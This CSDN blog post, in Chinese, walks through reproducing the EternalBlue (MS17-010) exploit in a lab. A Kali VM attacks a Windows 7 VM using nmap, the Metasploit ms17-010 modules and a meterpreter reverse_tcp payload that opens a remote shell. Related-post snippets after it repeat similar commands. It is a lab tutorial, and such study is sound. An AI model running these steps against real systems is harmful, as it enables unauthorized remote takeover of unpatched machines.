“永恒之蓝”漏洞介绍

已于 2023-11-23 22:16:48 修改
阅读量126 收藏
点赞数
文章标签: 网络安全 安全
于 2023-11-23 22:11:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Flipped_Move/article/details/134587501
版权

“永恒之蓝”漏洞介绍**
1.信息收集
因为我们是在同一局域网内,因此只需要要查看攻击主机跟受害主机分连通性,然后直接做信息收集即可。
攻击机:kali(192.168.220.133)
受害主机:windows 7(192.168.220.139) 

1.1.然后用命令nmap -O 192.168.220.139扫描主机发现极有可能是win7系统并且445端口开放

1.2此时我们就可以搜集windows 7系统的漏洞有哪些


MS17-010就是经典的“永恒之蓝”漏洞,可以加以利用。


2 漏洞查找
1.msfconsole启动我们的msf


2.search  ms17 010查找漏洞

3 漏洞利用


1.使用模块
use auxiliary/scanner/smb/smb_ms17_010
进入ms17 010漏洞
然后show options
查看漏洞配置信息!

2.查看模块主要针对的系统信息
 

3.设置攻击目标
set rhost 192.168.220.139将攻击目标地址添加进模块

4.设置监听主机


5.设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp

6.使用ms17-010攻击模块,对靶机进行攻击

7.运行,显示攻击成功

8.此时执行sysinfo,ipconfig两条命令我们会发现,操作系统信息和ip地址都已经是靶机的了。

然后就是后渗透阶段

此漏洞利用kali跟windows 7虚拟机复现

最后请大家遵守法律,不要瞎搞!!

长留...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
永恒之Windows10版初探
crowsec
03-15 1144
永恒之(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。相关的cve有:CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148。基本上我们搜索永恒之漏洞复现,99%的师傅选择的都是Windows7或者。
永恒之漏洞
Kali与编程
05-02 668
漏洞主要存在于Windows Server 2003、Windows XP、Windows 8以及Windows Server 2012等较老版本的操作系统中,尤其是对使用SMBv1(Server Message Block version 1)协议的系统影响尤为严重。永恒之(EternalBlue) 是一个著名的网络安全漏洞,首次出现在2017年4月14日,由黑客组织“影子经纪人”(Shadow Brokers)公开披露了一系列据称源自美国国家安全局(NSA)的秘密网络武器。
永恒之漏洞解析
CC_zzx的博客
10-27 3879
Microsoft Windows 7/2008 R2 - ‘EternalBlue’ SMB Remote Code Execution (MS17-010)“永恒之漏洞原理 一、漏洞概况 1、简介 永恒之是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之”利用Windows系统的SMB漏洞可以获取系统...
渗透测试基础之永恒之漏洞复现
weixin_72543266的博客
09-08 1374
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络的安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
永恒之漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之? 永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
永恒之漏洞复现及防御
wangmenghang的博客
08-29 627
永恒之是指2017年4月14日晚,黑客团体Shadow Brokers(影子经济人)公布一大批网络攻击工具、期中包含永恒之工具,“永恒之”利用windows系统的链接:SMB漏洞可以获取漏洞最高权限。5月12日,不法份子通过改造“永恒之”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高兴内网、大型企业内网和政府机关中招,被勒索支付高额赎金才能恢复文件。
永恒之漏洞复现
qq_63301612的博客
11-28 886
简洁的复现出永恒之
永恒之漏洞攻击
qq_54250695的博客
05-16 2060
使用方法 进入框架:msfconsole 使用sear kali ip: 采用nat的桥接模式: 保证kali和win7能够通信 nmap -sS -A win7ip (查看攻击对象win7所开放的所有端口) msfconsole (启动渗透框架) search ms17_010 (查看ms17_010模块工具) 选择攻击模块: use exploit/windows/smb/ms17_010_e...
永恒之漏洞复现(详细版)
Zqinglele的博客
03-20 2324
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之漏洞属于什么漏洞/永恒之漏洞检测工具-零基础攻防笔记
程序员三九的博客
06-24 382
项目三 永恒之漏洞利用.docx,永恒之漏洞利用 本次测试主要是利用永恒之漏洞对windows7进行控制利用,掌握Metasploit工具的使用,知道永恒之漏洞利用原理。
永恒之漏洞扫描工具官方版
08-06
"永恒之漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之漏洞检测工具
10-10
永恒之漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,...
永恒之漏洞演示
12-22
利用kali linux在windows7上演示永恒之漏洞,有kali实战经验的可以看懂
永恒之(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
win2012R2永恒之安全补丁.zip
05-12
永恒之漏洞源自微软的SMB(Server Message Block)服务,这是一个允许网络上的计算机共享文件、打印机和网络资源的协议。该漏洞(CVE-2017-0144和CVE-2017-0145)允许远程代码执行,使得攻击者无需用户交互即可...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8321
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 309
IDF版本:4.4.7。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 560
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
Akamai+Noname强强联合 | API安全再加强
最新发布
AKAMAI_CHINA的博客
07-03 1063
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
wannacry永恒之漏洞介绍
05-28
WannaCry 勒索病毒是一种利用永恒之漏洞进行加密勒索的攻击手段,它利用了 Microsoft Windows 操作系统中一个安全漏洞,即 EternalBlue漏洞。该漏洞是美国国家安全局(NSA)发现并秘密利用多年的漏洞,直到2017年5...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值